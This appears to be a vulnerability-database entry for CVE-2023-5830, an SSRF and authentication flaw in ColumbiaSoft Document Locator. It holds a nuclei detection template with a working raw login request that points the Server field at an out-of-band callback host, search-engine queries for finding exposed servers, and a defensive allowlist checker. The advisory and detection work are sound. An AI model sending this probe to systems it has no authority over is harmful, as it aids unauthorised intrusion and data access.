ColumbiaSoft DocumentLocator - Improper Authentication

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability allowing unauthorized access to sensitive information. Upgrade to a patched version to fix the issue.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2023-5830 | 25 Nov 2024 00:00 | circl |
| CNNVD | ColumbiaSoft Document Locator Security Vulnerability | 27 Oct 2023 00:00 | cnnvd |
| CVE | CVE-2023-5830 | 27 Oct 2023 20:31 | cve |
| Cvelist | CVE-2023-5830 ColumbiaSoft Document Locator WebTools login improper authentication | 27 Oct 2023 20:31 | cvelist |
| NVD | CVE-2023-5830 | 27 Oct 2023 21:15 | nvd |
| OSV | CVE-2023-5830 | 27 Oct 2023 21:15 | osv |
| Prion | Authentication flaw | 27 Oct 2023 21:15 | prion |
| RedhatCVE | CVE-2023-5830 | 23 May 2025 04:33 | redhatcve |
| The Hacker News | Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack | 12 Mar 2025 11:56 | thn |
| VulnCheck KEV | VulnCheck KEV: CVE-2023-5830 | 11 Apr 2024 00:00 | vulncheck_kev |

id: CVE-2023-5830

info:
  name: ColumbiaSoft DocumentLocator - Improper Authentication
  author: Gonski
  severity: critical
  description: |
    Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.
  impact: |
    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
    - https://vuldb.com/?ctiid.243729
    - https://github.com/advisories/GHSA-j89v-wm7x-4434
    - https://vuldb.com/?id.243729
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5830
    cwe-id: CWE-287
    epss-score: 0.61043
    epss-percentile: 0.99045
    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: documentlocator
    product: document_locator
    shodan-query:
      - 'title:"Document Locator - WebTools"'
      - http.title:"document locator - webtools"
    fofa-query: title="document locator - webtools"
    google-query: intitle:"document locator - webtools"
  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /api/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        {
          "LoginType":"differentWindows",
          "User":"{{randstr}}",
          "Password":"{{rand_base(5, "abc")}}",
          "Domain":"{{randstr}}",
          "Server":"{{interactsh-url}}",
          "Repository":"{{randstr}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '"Authorized":false'
# digest: 4b0a00483046022100b28681831dfe2c1c046df1570a6e220de635b50fca90c668f6d3f8323c9178f9022100889eebbade6b17c33ee6e414879e1f60f20ad5ec9f78b50d8144a00aa1291f3f:922c64590222798bb761d5b6d8e72950
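
A defender-side check for the behaviour this template probes, added here as an example (it is not part of the ProjectDiscovery template or of ColumbiaSoft's code): it scans captured login requests, for instance from a reverse proxy that records request bodies, and flags any whose Server field is outside an allowlist. The allowlist hostnames, the sample requests and the case-insensitive path and key matching are assumptions.

```python
import json
from urllib.parse import urlsplit

LOGIN_PATH = "/api/authentication/login"  # endpoint named in the template
# Assumption: the only Document Locator servers WebTools should be pointed at.
ALLOWED_SERVERS = {"dl-app01", "dl-app01.corp.example"}

# Constructed sample of captured requests: (method, URL, JSON body).
SAMPLE_REQUESTS = [
    ("POST", "https://docs.corp.example/api/authentication/login",
     '{"LoginType":"differentWindows","User":"jsmith","Password":"x",'
     '"Domain":"CORP","Server":"dl-app01","Repository":"Main"}'),
    ("POST", "https://docs.corp.example/api/authentication/login",
     '{"LoginType":"differentWindows","User":"a","Password":"b",'
     '"Domain":"c","Server":"probe.oob.example","Repository":"d"}'),
    ("POST", "https://docs.corp.example/API/Authentication/Login",
     '{"server":"10.0.0.5","User":"a"}'),
    ("POST", "https://docs.corp.example/api/authentication/login", "not json"),
    ("GET", "https://docs.corp.example/api/documents", ""),
]

def check_login(method, url, body, allowed=ALLOWED_SERVERS):
    """Return a reason string for a suspicious login request, else None."""
    path = urlsplit(url).path.rstrip("/").lower()  # assumption: path is case-insensitive
    if method.upper() != "POST" or path != LOGIN_PATH:
        return None
    try:
        fields = json.loads(body)
    except ValueError:
        return "unparseable login body"
    if not isinstance(fields, dict):
        return "unparseable login body"
    # Match the key case-insensitively in case the server binds it that way.
    for key, value in fields.items():
        if key.lower() != "server":
            continue
        host = str(value).strip().lower().rstrip(".")
        if host not in allowed:
            return f"Server value not in allowlist: {value!r}"
    return None

def scan(requests):
    """Return (index, reason) for every request that check_login flags."""
    results = ((i, check_login(*req)) for i, req in enumerate(requests))
    return [(i, reason) for i, reason in results if reason]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_REQUESTS):
        print(idx, reason)
```

The same allowlist comparison can run inline at a proxy or WAF to reject the request instead of only reporting it, which limits exposure until the upgrade to a patched version is in place.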

Scores (04 Feb 2026 07:00, current)
Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 7.3 - 9.8
CVSS 2: 7.5
CVSS 3: 7.3
EPSS: 0.61043